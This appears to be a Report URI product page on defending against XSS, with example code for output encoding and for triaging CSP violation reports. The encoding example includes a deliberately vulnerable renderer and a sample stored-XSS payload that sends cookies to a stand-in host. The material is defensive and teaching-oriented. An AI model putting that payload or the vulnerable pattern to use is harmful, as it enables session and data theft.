XSS Protection

What is XSS?

Cross-Site Scripting, commonly abbreviated to XSS, is a dangerous class of security vulnerability for a web application to have. It allows an attacker to inject their own JavaScript into your website, where it runs in your origin with the same privileges as your own code, and at that point they can do almost anything they like.

There are several varieties of XSS, such as Persistent (stored) XSS, Reflected XSS or Self XSS to name some. All of them can result in catastrophic consequences, and any of them that ends with script being injected into the page can be detected with Report URI through Content Security Policy reporting. One caveat worth knowing: script a user is tricked into pasting into the browser's developer tools console is not subject to CSP, so a Self XSS of that particular kind will not produce a report.

What can attackers do with XSS?

If an attacker finds an XSS vulnerability in your website, the main limits on what they will be able to do will be their own imagination and their ability to write JavaScript. Running in your origin, their script can read anything your own page can: it can steal session tokens, capture what users type into forms such as payment pages, or rewrite the page to show phishing content.

Some of the most recent examples of XSS attacks are quite notable, including Magecart payment card skimming and cryptojacking attacks, which you can find examples of in our Case Studies section. These attacks cost companies millions of dollars to recover from and are just the tip of the iceberg when it comes to what's possible.

XSS was the most common vulnerability in 2019, accounting for 18% of discovered vulnerabilities.

- Snyk (State of Open Source Security)

Stopping XSS attacks

When it comes to Application Security, it's really important to understand Defense In Depth and where we, Report URI, fit into your strategy.

Your primary defence against XSS should be context-appropriate output encoding of untrusted data, so that injected markup is rendered as text rather than executed. Content Security Policy, with reporting through Report URI, should be your second line of defence: an enforced policy blocks injected script that the first line missed, and the violation report tells you immediately that an attempt was made, so you can respond quickly. In most cases that means the attack is neutralised before it even starts.
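As an added illustration of the first line of defence (example code written for this page, not Report URI's own code), the snippet below contrasts a deliberately vulnerable comment renderer with one that encodes untrusted data for the HTML context and validates URLs separately for the href context. The comment text, author name and the base URL used by safeHref are constructed assumptions.

```javascript
// Added example, not Report URI's code: context-aware output encoding.
// renderCommentUnsafe is deliberately vulnerable to show what encoding fixes.

// Encode the five characters that matter in HTML text and attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: raw interpolation into HTML. A comment body containing a
// script tag becomes live markup, and a javascript: link becomes clickable.
function renderCommentUnsafe(author, body, link) {
  return `<p><a href="${link}">${author}</a>: ${body}</p>`;
}

// The href attribute is a URL context, not an HTML context: HTML encoding a
// javascript: URL does not stop it running, so validate the scheme instead.
// The base origin is an assumption for resolving relative links.
function safeHref(link) {
  try {
    const u = new URL(link, "https://example.com/");
    return ["http:", "https:"].includes(u.protocol) ? u.href : "#";
  } catch {
    return "#";
  }
}

// Hardened: every untrusted value is encoded for the context it lands in.
function renderCommentSafe(author, body, link) {
  return `<p><a href="${escapeHtml(safeHref(link))}">${escapeHtml(author)}</a>: ${escapeHtml(body)}</p>`;
}

// Crude check, used only to demonstrate the difference between the two
// renderers: does the output still contain raw script markup or a
// javascript: URL?
function looksInjected(html) {
  return /<script|javascript:/i.test(html);
}

// Constructed attacker input: a stored comment that tries to steal cookies.
const ATTACK_BODY = "<script>fetch('https://collect.example.net/?c=' + document.cookie)</script>";
const ATTACK_LINK = "javascript:alert(1)";

console.log(renderCommentUnsafe("mallory", ATTACK_BODY, ATTACK_LINK)); // script tag intact
console.log(renderCommentSafe("mallory", ATTACK_BODY, ATTACK_LINK));   // rendered as text
```

Note that escapeHtml alone would not have fixed the link: the hardened renderer needs both the encoder for the text and attribute context and the scheme check for the URL context, which is why "output encoding" has to be matched to where the data is being written.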

Average time to identify a data breach in 2022: 207 days

- IBM

How we can help

Having worked with organisations both large and small, we appreciate it can be difficult to create a Content Security Policy, so we've worked hard to reduce that burden with our Tools and Features, some of which are detailed below.

Content Security Policy is a powerful security mechanism and now, you can leverage it with minimal overhead. Sign up for a free trial to get started today and if you need any help, reach out to csp@report-uri.com for support.

Script Watch

Script Watch will monitor all JavaScript dependencies across your entire site and immediately notify you of any changes. A new JavaScript dependency could be the start of a Magecart attack.

Because Script Watch leverages the browser's native Content Security Policy, there is no code or agent to deploy, and because it runs in your users' browsers it analyses your site in real time as they browse it. That avoids the limitations of external scanning services: pages behind authentication or paywalls, geo-sensitive content, and an attacker serving benign content to a known crawler while serving the malicious payload to real users.


Data Watch

Data Watch will monitor all of the locations that your webpages are sending data to. If your website starts sending data to a new location, it could be the start of a Magecart attack.

With Script Watch and Data Watch combined, you can monitor for clear indicators that your site has been compromised. Attackers will always want to inject their hostile JavaScript, and they'll always want to exfiltrate their stolen data.


Content Security Policy

Script Watch and Data Watch will allow you to rapidly detect and respond to a Magecart attack and combined, that capability puts you ahead of the field. If you want to take it a step further, Content Security Policy can mitigate a Magecart attack and stop it from even happening.

Deploying an effective Content Security Policy can be difficult, but our CSP Reporting allows you to gather feedback and safely test a policy in report-only mode (the Content-Security-Policy-Report-Only header), where the browser blocks nothing but reports everything the policy would have blocked, before you enforce it. Once enforced, an effective Content Security Policy will block a Magecart attack and stop the hostile JavaScript from even running.
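To make the mechanism behind report-only testing, Script Watch and Data Watch concrete, here is an added example (written for this page, not Report URI's own code) that builds a report-only policy value and triages CSP violation reports the way a Script Watch or Data Watch style check would: a script from a host outside the baseline is a new script dependency, a connection to a host outside the baseline is a new data destination. The report fields follow the "csp-report" JSON that browsers POST to a report-uri endpoint; the reporting endpoint, the baseline host lists and the sample reports are constructed assumptions.

```javascript
// Added example, not Report URI's code: triaging CSP violation reports.

// Baseline of hosts the site legitimately loads scripts from and sends data
// to. These are assumptions standing in for a real site's learned list.
const KNOWN_SCRIPT_HOSTS = new Set(["cdn.example.com"]);
const KNOWN_CONNECT_HOSTS = new Set(["api.example.com"]);

// Value for a Content-Security-Policy-Report-Only header. Nothing is blocked,
// but every resource the policy would have blocked is reported to the
// endpoint, so the policy can be tested before it is enforced.
function buildReportOnlyPolicy(reportEndpoint) {
  const scripts = [...KNOWN_SCRIPT_HOSTS].map((h) => "https://" + h).join(" ");
  const connects = [...KNOWN_CONNECT_HOSTS].map((h) => "https://" + h).join(" ");
  return (
    "default-src 'self'; " +
    `script-src 'self' ${scripts}; ` +
    `connect-src 'self' ${connects}; ` +
    `report-uri ${reportEndpoint}`
  );
}

// blocked-uri is a URL for remote resources, but "inline" or "eval" for
// inline script and "self" for same-origin. Reduce it to a comparable host.
function hostOf(blockedUri) {
  if (["self", "inline", "eval", ""].includes(blockedUri)) return blockedUri;
  try {
    return new URL(blockedUri).host;
  } catch {
    return blockedUri;
  }
}

// Classify one report. effective-directive names the directive that actually
// applied; older browsers send only violated-directive, which may carry the
// whole directive text ("img-src 'self'"), so keep its first token.
function triageReport(report) {
  const r = report["csp-report"];
  const directive = r["effective-directive"] || String(r["violated-directive"]).split(" ")[0];
  const host = hostOf(r["blocked-uri"]);
  // disposition "enforce" means the browser blocked the resource;
  // "report" means the policy was report-only and the resource loaded.
  const blocked = r["disposition"] === "enforce";

  if (directive.startsWith("script-src")) {
    if (host === "inline" || host === "eval") {
      return { severity: "high", blocked, finding: `inline/eval script on ${r["document-uri"]}` };
    }
    return KNOWN_SCRIPT_HOSTS.has(host)
      ? { severity: "info", blocked, finding: `known script host ${host}` }
      : { severity: "high", blocked, finding: `new script dependency: ${host}` };
  }
  if (directive === "connect-src") {
    return KNOWN_CONNECT_HOSTS.has(host)
      ? { severity: "info", blocked, finding: `known data destination ${host}` }
      : { severity: "high", blocked, finding: `new data destination: ${host}` };
  }
  return { severity: "low", blocked, finding: `${directive} violation for ${host}` };
}

function triageAll(reports) {
  return reports.map(triageReport);
}

// Constructed sample reports, shaped like what a browser would POST:
// an unexpected script on the checkout page, an unexpected outbound
// connection from the same page, and a stray image on the home page.
const SAMPLE_REPORTS = [
  { "csp-report": { "document-uri": "https://shop.example.com/checkout", "effective-directive": "script-src-elem", "violated-directive": "script-src-elem", "blocked-uri": "https://static.example.net/jquery.min.js", "disposition": "report" } },
  { "csp-report": { "document-uri": "https://shop.example.com/checkout", "effective-directive": "connect-src", "violated-directive": "connect-src", "blocked-uri": "https://collect.example.net/c.php", "disposition": "enforce" } },
  { "csp-report": { "document-uri": "https://shop.example.com/", "violated-directive": "img-src 'self'", "blocked-uri": "https://img.example.org/banner.png", "disposition": "report" } },
];

console.log(buildReportOnlyPolicy("https://reports.example.com/csp"));
for (const result of triageAll(SAMPLE_REPORTS)) console.log(result);
```

The first two sample reports are exactly the pair of indicators the page describes: hostile JavaScript arriving from somewhere new, then stolen data leaving for somewhere new. Note that in the first report the disposition is "report", so the script actually ran; only an enforced policy would have stopped it.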


Threat Intelligence

We subscribe to various feeds of Threat Intelligence data, along with managing our own internally generated feeds, to keep apprised of the latest threats that exist online.

Using this Threat Intelligence Data, we can better analyse the sources of JavaScript on your website and detect malicious activity sooner.


The CSP Wizard

We often find that creating a CSP is the first difficult step that organisations face. Having a complete list of all resource dependencies across your entire site like images, scripts or styles, from both 1st-party and 3rd-party locations, is tough to achieve.

The CSP Wizard was created to solve this problem, and in seven days or less it can give you a complete list of all resources used across your entire site.

With the list of all resources you use on your site, and our easy-to-use tool, creating a viable Content Security Policy is easier than ever with just a few clicks.


The CSP Builder

All Content Security Policies will need to be tweaked at some point. New resources may be added to the site or old resources removed, and the policy needs to be updated to reflect those changes and kept up to date.

You can import your existing policy into the CSP Builder and use our fully featured tool to make any changes that you require right there in the UI. When you're done, hit Generate, and the CSP Builder will provide you with your new, updated policy.
